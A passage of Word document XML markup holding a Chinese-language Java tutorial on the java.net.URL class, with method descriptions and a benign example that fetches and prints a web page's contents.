        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6E72F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FC31B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI toURI()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回相当于此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBCA2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBE4A98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4084EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package dream.URL.test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3884E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4EDDEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4581D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.net.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED51EE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610FAA55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class URLTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310668FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取网页数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF62073" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>static void getFromURL1(String url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647CF9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URL u;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4B332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B53FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u = new URL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21EE0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URLConnection uc=u.openConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B613BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>InputStream in=uc.getInputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491FD0D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>byte[] b=new byte[1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A9A45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>int len;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D39B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>while((len=in.read(b))!=-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AC8A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FFBCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    System.out.println(new String(b,0,len));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB67D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2BC627" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>in.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D833B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13807010" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157D294" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61365D84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE846A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AD331" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24BBDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F480EE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70E3A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>static void getFromURL2(String url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D94905" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URL u=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2FAC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    BufferedReader in=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB02A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D18526" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>u = new URL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE03C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>in=new BufferedReader(new InputStreamReader(u.openStream(),"UTF-8"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512F41B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        String str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B8659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        while((str=in.readLine())!=null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CDFCAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   System.out.println(str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5462FB05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444D2EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        in.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C74FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900CBE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A3288" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91634C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B36EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96CD2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(in!=null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A488F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE70B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
